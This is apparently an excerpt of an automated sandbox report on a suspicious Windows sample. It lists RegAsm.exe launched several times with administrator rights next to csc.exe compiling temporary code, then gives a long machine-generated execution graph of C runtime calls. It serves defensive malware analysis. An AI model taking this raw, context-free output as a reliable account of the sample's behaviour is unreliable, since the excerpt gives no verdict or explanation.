                                                                                              Target ID:45
                                                                                              Start time:16:33:10
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                              Imagebase:0x810000
                                                                                              File size:65'440 bytes
                                                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:46
                                                                                              Start time:16:33:10
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.cmdline"
                                                                                              Imagebase:0x8c0000
                                                                                              File size:2'141'552 bytes
                                                                                              MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:47
                                                                                              Start time:16:33:11
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES374.tmp" "c:\Users\user\AppData\Local\Temp\3vvszjlk\CSC1C049BEBEBAF4B45B9D79F1CA1976831.TMP"
                                                                                              Imagebase:0x9f0000
                                                                                              File size:46'832 bytes
                                                                                              MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:48
                                                                                              Start time:16:33:12
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                              Imagebase:0x1c0000
                                                                                              File size:65'440 bytes
                                                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:49
                                                                                              Start time:16:33:13
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                              Imagebase:0x7c0000
                                                                                              File size:65'440 bytes
                                                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Disassembly

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:5.6%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:1%
                                                                                                Total number of Nodes:1384
                                                                                                Total number of Limit Nodes:25
                                                                                                execution_graph 8681 6f955391 8713 6f956c3d 8681->8713 8684 6f9553cc 8686 6f955404 8684->8686 8687 6f9553d0 8684->8687 8685 6f9554a1 8690 6f954f7d _Deallocate 11 API calls 8685->8690 8691 6f95546d 8686->8691 8692 6f956a7b __dosmaperr 14 API calls 8686->8692 8688 6f9553d6 8687->8688 8689 6f9553e3 8687->8689 8693 6f956a8e __freea 14 API calls 8688->8693 8694 6f9577f8 44 API calls 8689->8694 8695 6f9554ab 8690->8695 8699 6f956a8e __freea 14 API calls 8691->8699 8696 6f955421 8692->8696 8702 6f9553db 8693->8702 8697 6f9553eb 8694->8697 8698 6f956a7b __dosmaperr 14 API calls 8696->8698 8700 6f956a8e __freea 14 API calls 8697->8700 8701 6f955428 8698->8701 8699->8702 8700->8702 8705 6f956a7b __dosmaperr 14 API calls 8701->8705 8703 6f951cf9 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 8702->8703 8704 6f95549f 8703->8704 8706 6f955442 8705->8706 8707 6f955447 8706->8707 8708 6f955468 8706->8708 8710 6f956a7b __dosmaperr 14 API calls 8706->8710 8711 6f956a8e __freea 14 API calls 8707->8711 8709 6f956a7b __dosmaperr 14 API calls 8708->8709 8709->8691 8712 6f955455 8710->8712 8711->8702 8712->8707 8712->8708 8716 6f956ac8 8713->8716 8717 6f956ad4 CallCatchBlock 8716->8717 8724 6f956933 EnterCriticalSection 8717->8724 8719 6f956adf 8725 6f956b2d 8719->8725 8724->8719 8726 6f956b3c 8725->8726 8727 6f956b4f 8725->8727 8728 6f956a7b __dosmaperr 14 API calls 8726->8728 8727->8726 8729 6f956b62 8727->8729 8730 6f956b41 8728->8730 8746 6f956bd0 8729->8746 8732 6f954f50 __strnicoll 39 API calls 8730->8732 8733 6f956afb 8732->8733 8743 6f956b24 8733->8743 8734 6f956b6b CallUnexpected 8734->8733 8735 6f956ba7 8734->8735 8736 6f956b96 8734->8736 8737 6f956040 ___std_exception_copy 39 API calls 8735->8737 8738 6f956a7b __dosmaperr 14 API calls 8736->8738 8739 6f956bb2 8737->8739 8738->8733 8739->8733 8740 6f956bc3 8739->8740 8741 6f954f7d _Deallocate 11 API calls 8740->8741 8742 6f956bcf 8741->8742 8860 6f95697b LeaveCriticalSection 8743->8860 8745 6f9553bc 8745->8684 8745->8685 8748 6f956bdd 8746->8748 8747 6f956c30 8747->8734 8748->8747 8750 6f95a89b 8748->8750 8751 6f95a8af 8750->8751 8752 6f95a8a9 8750->8752 8768 6f95a8c4 8751->8768 8755 6f95cc30 8752->8755 8756 6f95cbe8 8752->8756 8788 6f95cc46 8755->8788 8757 6f95cbee 8756->8757 8760 6f95cc0b 8756->8760 8759 6f956a7b __dosmaperr 14 API calls 8757->8759 8762 6f95cbf3 8759->8762 8764 6f956a7b __dosmaperr 14 API calls 8760->8764 8767 6f95cc29 8760->8767 8761 6f95cbfe 8761->8748 8763 6f954f50 __strnicoll 39 API calls 8762->8763 8763->8761 8765 6f95cc1a 8764->8765 8766 6f954f50 __strnicoll 39 API calls 8765->8766 8766->8761 8767->8748 8769 6f9576bf __strnicoll 39 API calls 8768->8769 8771 6f95a8da 8769->8771 8770 6f95a8f6 8773 6f956a7b __dosmaperr 14 API calls 8770->8773 8771->8770 8772 6f95a90d 8771->8772 8774 6f95a8bf 8771->8774 8776 6f95a916 8772->8776 8777 6f95a928 8772->8777 8775 6f95a8fb 8773->8775 8774->8748 8780 6f954f50 __strnicoll 39 API calls 8775->8780 8781 6f956a7b __dosmaperr 14 API calls 8776->8781 8778 6f95a935 8777->8778 8779 6f95a948 8777->8779 8782 6f95cc46 __strnicoll 39 API calls 8778->8782 8806 6f95cfb0 8779->8806 8780->8774 8784 6f95a91b 8781->8784 8782->8774 8786 6f954f50 __strnicoll 39 API calls 8784->8786 8786->8774 8787 6f956a7b __dosmaperr 14 API calls 8787->8774 8789 6f95cc56 8788->8789 8790 6f95cc70 8788->8790 8791 6f956a7b __dosmaperr 14 API calls 8789->8791 8792 6f95cc8f 8790->8792 8793 6f95cc78 8790->8793 8794 6f95cc5b 8791->8794 8796 6f95ccb2 8792->8796 8797 6f95cc9b 8792->8797 8795 6f956a7b __dosmaperr 14 API calls 8793->8795 8798 6f954f50 __strnicoll 39 API calls 8794->8798 8799 6f95cc7d 8795->8799 8801 6f9576bf __strnicoll 39 API calls 8796->8801 8804 6f95cc66 8796->8804 8800 6f956a7b __dosmaperr 14 API calls 8797->8800 8798->8804 8802 6f954f50 __strnicoll 39 API calls 8799->8802 8803 6f95cca0 8800->8803 8801->8804 8802->8804 8805 6f954f50 __strnicoll 39 API calls 8803->8805 8804->8761 8805->8804 8807 6f9576bf __strnicoll 39 API calls 8806->8807 8808 6f95cfc3 8807->8808 8811 6f95cd11 8808->8811 8816 6f95cd45 __strnicoll 8811->8816 8812 6f951cf9 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 8813 6f95a95e 8812->8813 8813->8774 8813->8787 8814 6f95cfa9 8815 6f95cdc5 8817 6f958ad1 __strnicoll MultiByteToWideChar 8815->8817 8823 6f95cdc9 8815->8823 8816->8814 8816->8815 8818 6f95cdb2 GetCPInfo 8816->8818 8816->8823 8820 6f95ce4b 8817->8820 8818->8815 8818->8823 8819 6f95cf9d 8821 6f95a87b __freea 14 API calls 8819->8821 8820->8819 8822 6f95786a __strnicoll 15 API calls 8820->8822 8820->8823 8824 6f95ce72 __alloca_probe_16 8820->8824 8821->8823 8822->8824 8823->8812 8823->8814 8824->8819 8825 6f958ad1 __strnicoll MultiByteToWideChar 8824->8825 8826 6f95cebe 8825->8826 8826->8819 8827 6f958ad1 __strnicoll MultiByteToWideChar 8826->8827 8828 6f95ceda 8827->8828 8828->8819 8829 6f95cee8 8828->8829 8830 6f95cf4b 8829->8830 8831 6f95786a __strnicoll 15 API calls 8829->8831 8835 6f95cf01 __alloca_probe_16 8829->8835 8844 6f95a87b 8830->8844 8831->8835 8834 6f95a87b __freea 14 API calls 8834->8823 8835->8830 8836 6f958ad1 __strnicoll MultiByteToWideChar 8835->8836 8837 6f95cf44 8836->8837 8837->8830 8838 6f95cf6d 8837->8838 8848 6f9592dc 8838->8848 8841 6f95a87b __freea 14 API calls 8842 6f95cf8d 8841->8842 8843 6f95a87b __freea 14 API calls 8842->8843 8843->8823 8845 6f95a887 8844->8845 8846 6f95a898 8844->8846 8845->8846 8847 6f956a8e __freea 14 API calls 8845->8847 8846->8834 8847->8846 8854 6f9590df 8848->8854 8852 6f95932d CompareStringW 8853 6f9592ed 8852->8853 8853->8841 8855 6f9591f8 _unexpected 5 API calls 8854->8855 8856 6f9590f5 8855->8856 8856->8853 8857 6f9594e0 8856->8857 8858 6f959113 __strnicoll 5 API calls 8857->8858 8859 6f9594eb __strnicoll 8858->8859 8859->8852 8860->8745 9492 6f955e81 9493 6f955e89 9492->9493 9494 6f955e1f __EH_prolog3 9492->9494 9497 6f955ce4 9494->9497 9496 6f955e4c __DllMainCRTStartup@12 9498 6f955cf0 CallCatchBlock 9497->9498 9505 6f956933 EnterCriticalSection 9498->9505 9500 6f955cfe 9506 6f955d3f 9500->9506 9505->9500 9507 6f955d5e 9506->9507 9508 6f955d0b 9506->9508 9507->9508 9509 6f956a8e __freea 14 API calls 9507->9509 9510 6f955d33 9508->9510 9509->9508 9513 6f95697b LeaveCriticalSection 9510->9513 9512 6f955d1c 9512->9496 9513->9512 8861 6f951000 8874 6f951360 8861->8874 8863 6f95101d 8864 6f951360 41 API calls 8863->8864 8865 6f95102a 8864->8865 8878 6f95537b 8865->8878 8869 6f95105b 8870 6f951560 task 39 API calls 8869->8870 8871 6f951063 8870->8871 8872 6f951cf9 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 8871->8872 8873 6f95106d 8872->8873 8875 6f951376 8874->8875 8884 6f9519e0 8875->8884 8877 6f9513a1 task 8877->8863 8879 6f95519b CallUnexpected 21 API calls 8878->8879 8880 6f951053 8879->8880 8881 6f951560 8880->8881 8986 6f9518b0 8881->8986 8883 6f95156f task 8883->8869 8885 6f9519f0 8884->8885 8888 6f951a10 8885->8888 8887 6f951a09 8887->8877 8889 6f951a68 8888->8889 8891 6f951a24 task 8888->8891 8892 6f9511f0 8889->8892 8891->8887 8893 6f951201 8892->8893 8895 6f95120b task 8893->8895 8900 6f951990 8893->8900 8903 6f9519a0 8895->8903 8897 6f95123d task 8899 6f951292 8897->8899 8907 6f951ad0 8897->8907 8899->8891 8910 6f951c9b 8900->8910 8904 6f9519b0 allocator 8903->8904 8942 6f9510a0 8904->8942 8978 6f9511a0 8907->8978 8909 6f951ae4 8909->8899 8915 6f951c23 8910->8915 8914 6f951cba 8921 6f951bd3 8915->8921 8918 6f952f62 8919 6f952fa9 RaiseException 8918->8919 8920 6f952f7c 8918->8920 8919->8914 8920->8919 8924 6f952ee0 8921->8924 8925 6f952eed 8924->8925 8931 6f951bff 8924->8931 8925->8931 8932 6f955549 8925->8932 8928 6f952f1a 8939 6f9555ad 8928->8939 8929 6f956040 ___std_exception_copy 39 API calls 8929->8928 8931->8918 8937 6f95786a _unexpected 8932->8937 8933 6f9578a8 8934 6f956a7b __dosmaperr 14 API calls 8933->8934 8936 6f952f0a 8934->8936 8935 6f957893 HeapAlloc 8935->8936 8935->8937 8936->8928 8936->8929 8937->8933 8937->8935 8938 6f9554c6 _Allocate EnterCriticalSection LeaveCriticalSection 8937->8938 8938->8937 8940 6f956a8e __freea 14 API calls 8939->8940 8941 6f9555c5 8940->8941 8941->8931 8943 6f9510ac 8942->8943 8944 6f9510ba 8942->8944 8948 6f9510e0 8943->8948 8947 6f9510b5 8944->8947 8956 6f951750 8944->8956 8947->8897 8949 6f9510f7 8948->8949 8950 6f9510fc 8948->8950 8959 6f951890 8949->8959 8952 6f951750 _Allocate 16 API calls 8950->8952 8953 6f951105 8952->8953 8955 6f951120 8953->8955 8963 6f954f60 8953->8963 8955->8947 8968 6f951cbb 8956->8968 8960 6f95189e stdext::threads::lock_error::lock_error 8959->8960 8961 6f952f62 CallUnexpected RaiseException 8960->8961 8962 6f9518ac 8961->8962 8962->8950 8964 6f954e9c _Deallocate 39 API calls 8963->8964 8965 6f954f6f 8964->8965 8966 6f954f7d _Deallocate 11 API calls 8965->8966 8967 6f954f7c 8966->8967 8970 6f951cc0 8968->8970 8969 6f955549 ___std_exception_copy 15 API calls 8969->8970 8970->8969 8971 6f95175c 8970->8971 8972 6f9554c6 _Allocate 2 API calls 8970->8972 8974 6f951cdc _Allocate 8970->8974 8971->8947 8972->8970 8973 6f9520a9 stdext::threads::lock_error::lock_error 8975 6f952f62 CallUnexpected RaiseException 8973->8975 8974->8973 8976 6f952f62 CallUnexpected RaiseException 8974->8976 8977 6f9520c6 8975->8977 8976->8973 8979 6f9511b9 _Deallocate 8978->8979 8980 6f9511ac 8978->8980 8979->8909 8982 6f9516e0 8980->8982 8983 6f95171e 8982->8983 8984 6f954f60 _Deallocate 39 API calls 8983->8984 8985 6f951739 8983->8985 8984->8983 8985->8979 8988 6f9518c1 task 8986->8988 8987 6f951905 task 8987->8883 8988->8987 8989 6f951ad0 allocator 39 API calls 8988->8989 8989->8987 7893 6f956cb6 7894 6f956cc5 7893->7894 7895 6f956cdd 7893->7895 8022 6f956a7b 7894->8022 7895->7894 7900 6f956cf4 _strrchr 7895->7900 7899 6f956d82 _strrchr 7901 6f956da2 7899->7901 7902 6f956dcd 7899->7902 7900->7899 7905 6f956d31 7900->7905 7946 6f9577f8 7901->7946 7907 6f9578b8 _unexpected 14 API calls 7902->7907 8028 6f9578b8 7905->8028 7906 6f956daa 7909 6f956db4 7906->7909 7910 6f956e5e 7906->7910 7911 6f956de9 7907->7911 7959 6f956eab 7909->7959 7917 6f956a8e __freea 14 API calls 7910->7917 7914 6f956df1 7911->7914 7915 6f956e00 7911->7915 7919 6f956a8e __freea 14 API calls 7914->7919 7920 6f956040 ___std_exception_copy 39 API calls 7915->7920 7916 6f956d46 7916->7910 7921 6f956cd5 7917->7921 7918 6f956dc3 7923 6f956a8e __freea 14 API calls 7918->7923 7924 6f956df7 7919->7924 7925 6f956e0b 7920->7925 7923->7921 7924->7918 7927 6f956e9c 7925->7927 7929 6f956a7b __dosmaperr 14 API calls 7925->7929 8059 6f954f7d IsProcessorFeaturePresent 7927->8059 7937 6f956e23 7929->7937 7931 6f956ea8 7934 6f956040 ___std_exception_copy 39 API calls 7934->7937 7936 6f9577f8 44 API calls 7936->7937 7937->7927 7937->7934 7937->7936 7938 6f956e6d 7937->7938 7939 6f956e57 7937->7939 7940 6f956a7b __dosmaperr 14 API calls 7938->7940 7941 6f956a8e __freea 14 API calls 7939->7941 7942 6f956e72 7940->7942 7941->7916 7943 6f956eab 53 API calls 7942->7943 7944 6f956e86 7943->7944 7945 6f956a8e __freea 14 API calls 7944->7945 7945->7924 7947 6f957814 7946->7947 7948 6f957806 7946->7948 8089 6f957741 7947->8089 8063 6f957532 7948->8063 7955 6f957532 41 API calls 7956 6f957842 7955->7956 7957 6f957864 7956->7957 7958 6f956a8e __freea 14 API calls 7956->7958 7957->7906 7958->7957 7960 6f956ece 7959->7960 7961 6f956eb9 7959->7961 7960->7961 7964 6f956ee4 7960->7964 7965 6f956eda 7960->7965 7962 6f956a7b __dosmaperr 14 API calls 7961->7962 7963 6f956ebe 7962->7963 7967 6f954f50 __strnicoll 39 API calls 7963->7967 7969 6f956f22 7964->7969 7970 6f956f0b 7964->7970 7966 6f956a68 __dosmaperr 14 API calls 7965->7966 7966->7961 7968 6f956ec9 7967->7968 7968->7918 8575 6f9571ed 7969->8575 7971 6f956a8e __freea 14 API calls 7970->7971 7973 6f956f13 7971->7973 7975 6f956a8e __freea 14 API calls 7973->7975 7978 6f956f1e 7975->7978 7976 6f956f44 7979 6f956a8e __freea 14 API calls 7976->7979 7977 6f956f6c 7980 6f956a68 __dosmaperr 14 API calls 7977->7980 7978->7918 7981 6f956f4c 7979->7981 7983 6f956f7d CallUnexpected 7980->7983 7982 6f956a8e __freea 14 API calls 7981->7982 7984 6f956f57 7982->7984 8578 6f95ae14 7983->8578 7985 6f956a8e __freea 14 API calls 7984->7985 7985->7978 7988 6f957014 GetLastError 7989 6f956a21 __dosmaperr 14 API calls 7988->7989 7995 6f957020 7989->7995 7990 6f956fd6 7992 6f957039 7990->7992 7993 6f956fda WaitForSingleObject GetExitCodeProcess 7990->7993 7991 6f9570af 7994 6f95535e CallUnexpected 21 API calls 7991->7994 8000 6f95703e 7992->8000 8001 6f95707a 7992->8001 7993->7988 7996 6f956ff3 7993->7996 7997 6f9570b6 7994->7997 7998 6f957025 CloseHandle 7995->7998 7999 6f95702c 7995->7999 8002 6f957004 7996->8002 8003 6f956ffd CloseHandle 7996->8003 7998->7999 8006 6f95700f 7999->8006 8007 6f957030 CloseHandle 7999->8007 8008 6f957042 CloseHandle 8000->8008 8009 6f957049 8000->8009 8004 6f957085 8001->8004 8005 6f95707e CloseHandle 8001->8005 8002->8006 8012 6f957008 CloseHandle 8002->8012 8003->8002 8013 6f956a8e __freea 14 API calls 8004->8013 8005->8004 8011 6f956a8e __freea 14 API calls 8006->8011 8007->8006 8008->8009 8009->8006 8010 6f95704d CloseHandle 8009->8010 8010->8006 8014 6f95705e 8011->8014 8012->8006 8015 6f95708d 8013->8015 8016 6f956a8e __freea 14 API calls 8014->8016 8017 6f956a8e __freea 14 API calls 8015->8017 8018 6f95706a 8016->8018 8019 6f957099 8017->8019 8021 6f956a8e __freea 14 API calls 8018->8021 8020 6f956a8e __freea 14 API calls 8019->8020 8020->7978 8021->7978 8023 6f9566b8 __dosmaperr 14 API calls 8022->8023 8024 6f956a80 8023->8024 8025 6f954f50 8024->8025 8624 6f954e9c 8025->8624 8033 6f9578c5 _unexpected 8028->8033 8029 6f957905 8031 6f956a7b __dosmaperr 13 API calls 8029->8031 8030 6f9578f0 HeapAlloc 8032 6f956d3e 8030->8032 8030->8033 8031->8032 8032->7916 8035 6f956040 8032->8035 8033->8029 8033->8030 8034 6f9554c6 _Allocate 2 API calls 8033->8034 8034->8033 8036 6f95605c 8035->8036 8037 6f95604e 8035->8037 8038 6f956a7b __dosmaperr 14 API calls 8036->8038 8037->8036 8042 6f956074 8037->8042 8039 6f956064 8038->8039 8040 6f954f50 __strnicoll 39 API calls 8039->8040 8041 6f95606e 8040->8041 8041->7927 8044 6f95a98c 8041->8044 8042->8041 8043 6f956a7b __dosmaperr 14 API calls 8042->8043 8043->8039 8045 6f95a99a 8044->8045 8048 6f95a9a8 8044->8048 8045->8048 8050 6f95a9cf 8045->8050 8046 6f956a7b __dosmaperr 14 API calls 8052 6f95a9b0 8046->8052 8047 6f954f50 __strnicoll 39 API calls 8049 6f956d6b 8047->8049 8048->8046 8049->7927 8053 6f956a8e 8049->8053 8050->8049 8051 6f956a7b __dosmaperr 14 API calls 8050->8051 8051->8052 8052->8047 8054 6f956ac3 8053->8054 8055 6f956a99 HeapFree 8053->8055 8054->7899 8055->8054 8056 6f956aae GetLastError 8055->8056 8057 6f956abb __dosmaperr 8056->8057 8058 6f956a7b __dosmaperr 12 API calls 8057->8058 8058->8054 8060 6f954f89 8059->8060 8061 6f954d54 CallUnexpected 8 API calls 8060->8061 8062 6f954f9e GetCurrentProcess TerminateProcess 8061->8062 8062->7931 8064 6f957567 8063->8064 8065 6f95754c 8063->8065 8067 6f957573 8064->8067 8068 6f95758e GetFileAttributesExW 8064->8068 8097 6f956a68 8065->8097 8072 6f956a68 __dosmaperr 14 API calls 8067->8072 8069 6f95759f GetLastError 8068->8069 8070 6f9575ae 8068->8070 8100 6f956a21 8069->8100 8081 6f956a68 __dosmaperr 14 API calls 8070->8081 8086 6f957563 8070->8086 8075 6f957578 8072->8075 8074 6f956a7b __dosmaperr 14 API calls 8076 6f957559 8074->8076 8077 6f956a7b __dosmaperr 14 API calls 8075->8077 8078 6f954f50 __strnicoll 39 API calls 8076->8078 8079 6f957580 8077->8079 8078->8086 8083 6f954f50 __strnicoll 39 API calls 8079->8083 8085 6f9575c6 8081->8085 8082 6f956a7b __dosmaperr 14 API calls 8082->8086 8083->8086 8084 6f9575ee 8084->7906 8087 6f956a7b __dosmaperr 14 API calls 8085->8087 8105 6f951cf9 8086->8105 8088 6f9575ab 8087->8088 8088->8082 8304 6f9576bf 8089->8304 8092 6f957765 8094 6f9576a2 8092->8094 8519 6f9575f0 8094->8519 8112 6f9566b8 GetLastError 8097->8112 8099 6f956a6d 8099->8074 8101 6f956a68 __dosmaperr 14 API calls 8100->8101 8102 6f956a2c __dosmaperr 8101->8102 8103 6f956a7b __dosmaperr 14 API calls 8102->8103 8104 6f956a3f 8103->8104 8104->8088 8106 6f951d01 8105->8106 8107 6f951d02 IsProcessorFeaturePresent 8105->8107 8106->8084 8109 6f952109 8107->8109 8303 6f9520cc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8109->8303 8111 6f9521ec 8111->8084 8113 6f9566ce 8112->8113 8114 6f9566d4 8112->8114 8135 6f9593b7 8113->8135 8118 6f9566d8 SetLastError 8114->8118 8140 6f9593f6 8114->8140 8118->8099 8120 6f9578b8 _unexpected 12 API calls 8121 6f956705 8120->8121 8122 6f95670d 8121->8122 8123 6f95671e 8121->8123 8124 6f9593f6 _unexpected 6 API calls 8122->8124 8125 6f9593f6 _unexpected 6 API calls 8123->8125 8132 6f95671b 8124->8132 8126 6f95672a 8125->8126 8127 6f956745 8126->8127 8128 6f95672e 8126->8128 8145 6f956369 8127->8145 8129 6f9593f6 _unexpected 6 API calls 8128->8129 8129->8132 8130 6f956a8e __freea 12 API calls 8130->8118 8132->8130 8134 6f956a8e __freea 12 API calls 8134->8118 8150 6f9591f8 8135->8150 8138 6f9593ee TlsGetValue 8139 6f9593dc 8139->8114 8141 6f9591f8 _unexpected 5 API calls 8140->8141 8142 6f959412 8141->8142 8143 6f959430 TlsSetValue 8142->8143 8144 6f9566f0 8142->8144 8144->8118 8144->8120 8165 6f9561fd 8145->8165 8151 6f959224 8150->8151 8152 6f959228 8150->8152 8151->8138 8151->8139 8152->8151 8157 6f95912d 8152->8157 8155 6f959242 GetProcAddress 8155->8151 8156 6f959252 _unexpected 8155->8156 8156->8151 8163 6f95913e ___vcrt_FlsFree 8157->8163 8158 6f9591d4 8158->8151 8158->8155 8159 6f95915c LoadLibraryExW 8160 6f959177 GetLastError 8159->8160 8161 6f9591db 8159->8161 8160->8163 8161->8158 8162 6f9591ed FreeLibrary 8161->8162 8162->8158 8163->8158 8163->8159 8164 6f9591aa LoadLibraryExW 8163->8164 8164->8161 8164->8163 8166 6f956209 CallCatchBlock 8165->8166 8179 6f956933 EnterCriticalSection 8166->8179 8168 6f956213 8180 6f956243 8168->8180 8171 6f95630f 8172 6f95631b CallCatchBlock 8171->8172 8184 6f956933 EnterCriticalSection 8172->8184 8174 6f956325 8185 6f9564f0 8174->8185 8176 6f95633d 8189 6f95635d 8176->8189 8179->8168 8183 6f95697b LeaveCriticalSection 8180->8183 8182 6f956231 8182->8171 8183->8182 8184->8174 8186 6f956526 __strnicoll 8185->8186 8187 6f9564ff __strnicoll 8185->8187 8186->8176 8187->8186 8192 6f95a1ed 8187->8192 8302 6f95697b LeaveCriticalSection 8189->8302 8191 6f95634b 8191->8134 8193 6f95a26d 8192->8193 8196 6f95a203 8192->8196 8195 6f956a8e __freea 14 API calls 8193->8195 8218 6f95a2bb 8193->8218 8197 6f95a28f 8195->8197 8196->8193 8200 6f956a8e __freea 14 API calls 8196->8200 8202 6f95a236 8196->8202 8198 6f956a8e __freea 14 API calls 8197->8198 8201 6f95a2a2 8198->8201 8199 6f95a2c9 8208 6f95a329 8199->8208 8217 6f956a8e 14 API calls __freea 8199->8217 8204 6f95a22b 8200->8204 8205 6f956a8e __freea 14 API calls 8201->8205 8206 6f956a8e __freea 14 API calls 8202->8206 8219 6f95a258 8202->8219 8203 6f956a8e __freea 14 API calls 8207 6f95a262 8203->8207 8220 6f95a50a 8204->8220 8211 6f95a2b0 8205->8211 8212 6f95a24d 8206->8212 8213 6f956a8e __freea 14 API calls 8207->8213 8209 6f956a8e __freea 14 API calls 8208->8209 8214 6f95a32f 8209->8214 8215 6f956a8e __freea 14 API calls 8211->8215 8248 6f95a608 8212->8248 8213->8193 8214->8186 8215->8218 8217->8199 8260 6f95a35e 8218->8260 8219->8203 8221 6f95a51b 8220->8221 8247 6f95a604 8220->8247 8222 6f95a52c 8221->8222 8224 6f956a8e __freea 14 API calls 8221->8224 8223 6f95a53e 8222->8223 8225 6f956a8e __freea 14 API calls 8222->8225 8226 6f95a550 8223->8226 8227 6f956a8e __freea 14 API calls 8223->8227 8224->8222 8225->8223 8228 6f95a562 8226->8228 8229 6f956a8e __freea 14 API calls 8226->8229 8227->8226 8230 6f95a574 8228->8230 8232 6f956a8e __freea 14 API calls 8228->8232 8229->8228 8231 6f95a586 8230->8231 8233 6f956a8e __freea 14 API calls 8230->8233 8234 6f95a598 8231->8234 8235 6f956a8e __freea 14 API calls 8231->8235 8232->8230 8233->8231 8236 6f95a5aa 8234->8236 8237 6f956a8e __freea 14 API calls 8234->8237 8235->8234 8238 6f956a8e __freea 14 API calls 8236->8238 8241 6f95a5bc 8236->8241 8237->8236 8238->8241 8239 6f956a8e __freea 14 API calls 8240 6f95a5ce 8239->8240 8242 6f956a8e __freea 14 API calls 8240->8242 8244 6f95a5e0 8240->8244 8241->8239 8241->8240 8242->8244 8243 6f95a5f2 8246 6f956a8e __freea 14 API calls 8243->8246 8243->8247 8244->8243 8245 6f956a8e __freea 14 API calls 8244->8245 8245->8243 8246->8247 8247->8202 8249 6f95a615 8248->8249 8250 6f95a66d 8248->8250 8251 6f95a625 8249->8251 8253 6f956a8e __freea 14 API calls 8249->8253 8250->8219 8252 6f95a637 8251->8252 8254 6f956a8e __freea 14 API calls 8251->8254 8255 6f95a649 8252->8255 8256 6f956a8e __freea 14 API calls 8252->8256 8253->8251 8254->8252 8257 6f95a65b 8255->8257 8258 6f956a8e __freea 14 API calls 8255->8258 8256->8255 8257->8250 8259 6f956a8e __freea 14 API calls 8257->8259 8258->8257 8259->8250 8261 6f95a36b 8260->8261 8265 6f95a38a 8260->8265 8261->8265 8266 6f95a696 8261->8266 8264 6f956a8e __freea 14 API calls 8264->8265 8265->8199 8267 6f95a384 8266->8267 8268 6f95a6a7 8266->8268 8267->8264 8269 6f95a671 __strnicoll 14 API calls 8268->8269 8270 6f95a6af 8269->8270 8271 6f95a671 __strnicoll 14 API calls 8270->8271 8272 6f95a6ba 8271->8272 8273 6f95a671 __strnicoll 14 API calls 8272->8273 8274 6f95a6c5 8273->8274 8275 6f95a671 __strnicoll 14 API calls 8274->8275 8276 6f95a6d0 8275->8276 8277 6f95a671 __strnicoll 14 API calls 8276->8277 8278 6f95a6de 8277->8278 8279 6f956a8e __freea 14 API calls 8278->8279 8280 6f95a6e9 8279->8280 8281 6f956a8e __freea 14 API calls 8280->8281 8282 6f95a6f4 8281->8282 8283 6f956a8e __freea 14 API calls 8282->8283 8284 6f95a6ff 8283->8284 8285 6f95a671 __strnicoll 14 API calls 8284->8285 8286 6f95a70d 8285->8286 8287 6f95a671 __strnicoll 14 API calls 8286->8287 8288 6f95a71b 8287->8288 8289 6f95a671 __strnicoll 14 API calls 8288->8289 8290 6f95a72c 8289->8290 8291 6f95a671 __strnicoll 14 API calls 8290->8291 8292 6f95a73a 8291->8292 8293 6f95a671 __strnicoll 14 API calls 8292->8293 8294 6f95a748 8293->8294 8295 6f956a8e __freea 14 API calls 8294->8295 8296 6f95a753 8295->8296 8297 6f956a8e __freea 14 API calls 8296->8297 8298 6f95a75e 8297->8298 8299 6f956a8e __freea 14 API calls 8298->8299 8300 6f95a769 8299->8300 8301 6f956a8e __freea 14 API calls 8300->8301 8301->8267 8302->8191 8303->8111 8305 6f9576d6 8304->8305 8306 6f9576dd 8304->8306 8305->8092 8312 6f9592bd 8305->8312 8306->8305 8315 6f956567 GetLastError 